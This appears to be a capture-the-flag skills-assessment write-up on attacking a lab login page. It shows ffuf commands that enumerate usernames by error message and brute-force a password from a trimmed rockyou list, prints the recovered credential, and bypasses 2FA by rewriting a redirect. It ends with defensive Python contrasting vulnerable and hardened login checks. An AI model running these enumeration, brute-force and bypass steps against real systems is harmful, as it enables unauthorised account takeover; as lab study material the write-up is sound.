# Skills Assessment

* Obtain the flag.

We can see a login panel and an option to create an account -->

<figure><img src="/files/SNBhH7DWHaKrgZOgg6jw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/iIuCUMJAfEE9srxHG5hS" alt=""><figcaption></figcaption></figure>

I try to create an account with the username admin, following its password policy -->

admin : Ad3456789012

<figure><img src="/files/QNbibUaeLbWwreoPh9lf" alt=""><figcaption></figcaption></figure>

BUT! I have the name admin but not the privileges of admin... this means that the admin user did not exist

<figure><img src="/files/hykSjLStFZknvccMyXKm" alt=""><figcaption></figcaption></figure>

okay, seeing that, enumerate users by error message -->

<figure><img src="/files/vZWEeRwdWEetQTG97yOA" alt=""><figcaption></figcaption></figure>

If I set a wrong password for a user (in this case admin), I get an error, so run ffuf -->

```
# -fr filters out responses carrying the unknown-username message; what remains are existing usernames
ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://83.136.249.246:33824/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=test" -fr "Unknown username or password." -s
--------------
Admin
admin
gladys
user1
```

AHA! gladys! DO BRUTE FORCE! Before that, maybe we should trim rockyou to the password policy and then run ffuf -->

```
# keep only the 12-character rockyou entries containing a digit, a lowercase and an uppercase letter (the site's password policy)
grep '[[:digit:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:upper:]]' | grep '[[:alnum:]]' | grep '^.\{12\}$' > custom_wordlist.txt
## then run ffuf against the trimmed list, filtering out the wrong-password message
ffuf -w ./custom_wordlist.txt -u http://83.136.249.246:33824/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -fr "Invalid credentials."
---
dWinaldasD13            [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 16ms]
```

<figure><img src="/files/FW950jIUSEEloXGh92Iq" alt=""><figcaption></figcaption></figure>

OPAA! 2FA, no problem, if I intercept it with Burp I can see the parameter and I can use Intruder to brute force it:

<figure><img src="/files/fAgPIIXSE5O54zIwPsmG" alt=""><figcaption></figcaption></figure>

BUT! I see the rate limit of the app. After 3 unsuccessful tries, the page redirects back to `login.php`

<figure><img src="/files/nEYDmKzwOinvJIewVVNy" alt=""><figcaption></figcaption></figure>

After intercepting the login request again, I can see that after I log in and the cookie is granted, the response redirects me to `/2fa.php`. My question is... can I redirect myself to `profile.php` directly and bypass the 2FA??? -->

<figure><img src="/files/c1Q8dZz64TrRPqPbg8WI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2Edgx5ibZmLRqWzYFtIK" alt=""><figcaption></figcaption></figure>

Apparently IT FOUND IT... but it gives us a 302 Found... maybe change it to 200 OK -->

<figure><img src="/files/RQkKa7fC4h8IifjJxeGx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ur74z52HwXVzGIXkKJNr" alt=""><figcaption></figcaption></figure>

HAHAHA NICE
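The two server-side mistakes this assessment turns on are the login page answering an unknown username and a wrong password with different messages (which is what the `-fr` filter keys on during enumeration) and a second factor that exists only as a 302 to `/2fa.php`, so a client that rewrites or ignores that response lands on `profile.php` authenticated. The Python below is an added example, not code from the assessment target: it models the vulnerable and the hardened version of each check side by side, with constructed users, passwords, OTP codes, cookie fields and paths, and includes the three-attempt lockout observed on the 2FA page.

```python
"""Server-side model of the two weaknesses used in the writeup above.

Added example, not code from the assessment target: user names, passwords,
OTP codes, session fields and paths below are constructed for illustration.
"""
import hmac
import secrets
from dataclasses import dataclass
from hashlib import pbkdf2_hmac
from typing import Optional

_SALT = b"constructed-salt"          # constructed; a real app uses a per-user random salt


def _hash(password: str) -> bytes:
    return pbkdf2_hmac("sha256", password.encode(), _SALT, 50_000)


# Constructed user store; every entry costs the same to verify.
USERS = {
    "gladys": {"hash": _hash("correct-horse"), "otp": "123456"},
    "user1": {"hash": _hash("another-pass"), "otp": "654321"},
}
# Compared against when the username is unknown, so unknown and known
# usernames take the same code path and roughly the same time.
_DUMMY_HASH = _hash(secrets.token_hex(16))

MAX_OTP_ATTEMPTS = 3


@dataclass
class Session:
    """What the server remembers about one session cookie."""
    user: Optional[str] = None
    mfa_verified: bool = False
    otp_failures: int = 0


def login_vulnerable(username: str, password: str) -> str:
    """Two different messages: filtering on the first one yields the valid usernames."""
    if username not in USERS:
        return "Unknown username or password."
    if not hmac.compare_digest(USERS[username]["hash"], _hash(password)):
        return "Invalid credentials."
    return "OK"


def login_hardened(username: str, password: str, session: Session) -> str:
    """One message for both failure cases, and a hash check even for unknown users."""
    record = USERS.get(username)
    expected = record["hash"] if record else _DUMMY_HASH
    matched = hmac.compare_digest(expected, _hash(password))
    if record is None or not matched:
        return "Invalid username or password."
    session.user = username
    session.mfa_verified = False     # second factor still outstanding
    session.otp_failures = 0
    return "OK"


def route_vulnerable(session: Session, path: str) -> tuple:
    """Only checks that a login happened; the 2FA step exists solely as a
    redirect to /2fa.php that the client is free to rewrite or ignore."""
    if session.user is None:
        return 302, "/login.php"
    if path == "/profile.php":
        return 200, "profile"
    return 200, path


def route_hardened(session: Session, path: str) -> tuple:
    """Every post-login page checks mfa_verified on the server, so what the
    client did with the /login.php response is irrelevant."""
    if session.user is None:
        return 302, "/login.php"
    if not session.mfa_verified and path != "/2fa.php":
        return 302, "/2fa.php"
    if path == "/profile.php":
        return 200, "profile"
    return 200, path


def verify_otp(session: Session, code: str) -> tuple:
    """2FA check with the lockout the writeup observed: the third wrong code
    drops the half-authenticated session and sends the user back to login."""
    if session.user is None:
        return 302, "/login.php"
    if hmac.compare_digest(USERS[session.user]["otp"], code):
        session.mfa_verified = True
        return 302, "/profile.php"
    session.otp_failures += 1
    if session.otp_failures >= MAX_OTP_ATTEMPTS:
        session.user = None
        session.otp_failures = 0
        return 302, "/login.php"
    return 200, "wrong code"


if __name__ == "__main__":
    s = Session()
    login_hardened("gladys", "correct-horse", s)
    print(route_vulnerable(s, "/profile.php"))   # reaches the profile with no second factor
    print(route_hardened(s, "/profile.php"))     # bounced to /2fa.php until the code is verified
```

The design point is that the gate must live on the page being protected, not on the page that redirects to it: `route_hardened` refuses `profile.php` until `mfa_verified` is set by the server, and the uniform login message removes the signal that separated `gladys` from the rest of the wordlist.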
